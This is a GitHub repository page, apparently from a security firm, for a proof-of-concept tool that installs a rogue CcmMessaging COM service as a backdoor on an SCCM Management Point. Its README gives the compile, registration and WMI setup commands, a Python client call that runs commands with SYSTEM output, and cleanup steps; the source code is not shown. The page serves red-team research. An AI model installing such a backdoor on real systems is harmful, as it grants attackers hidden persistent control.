CcmMessagingBackdoor

Proof of Concept tooling to build and install a rogue CcmMessaging service to maintain access on a Management Point

Usage

Compile and install the rogue COM service on the Management Point

# Compile
PS C:\> C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe /t:library /out:c:\rogue.dll RogueCcmEndpoint.cs

# Register CLSID
PS C:\> C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegAsm.exe /codebase c:\rogue.dll

Configure the service endpoint in WMI

PS C:\>  ./wmi_create_rogue_service_endpoint.ps1

Use the Python client to run powershell commands

$ python3 ccmmessaging_backdoor_client.py -t https://mp.corp.local -s MP_Backdoor 'whoami'
[...]
<BackdoorResponse>nt authority\system
</BackdoorResponse>

To clean

# Unregister CLSID
PS C:\> C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegAsm.exe /unregister c:\rogue.dll

PS C:\> ./wmi_remove_rogue_service_endpoint.ps1

TODO

Fix random crash of CcmExec process (unknown reason atm)

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Repository files navigation

CcmMessagingBackdoor

Usage

TODO

About

Uh oh!

Releases

Packages

Languages

Name		Name	Last commit message	Last commit date
Latest commit History 2 Commits
README.md		README.md
RogueCcmEndpoint.cs		RogueCcmEndpoint.cs
ccmmessaging_backdoor_client.py		ccmmessaging_backdoor_client.py
wmi_create_rogue_service_endpoint.ps1		wmi_create_rogue_service_endpoint.ps1
wmi_remove_rogue_service_endpoint.ps1		wmi_remove_rogue_service_endpoint.ps1

synacktiv/CcmMessagingBackdoor

Folders and files

Latest commit

History

Repository files navigation

CcmMessagingBackdoor

Usage

TODO

About

Resources

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages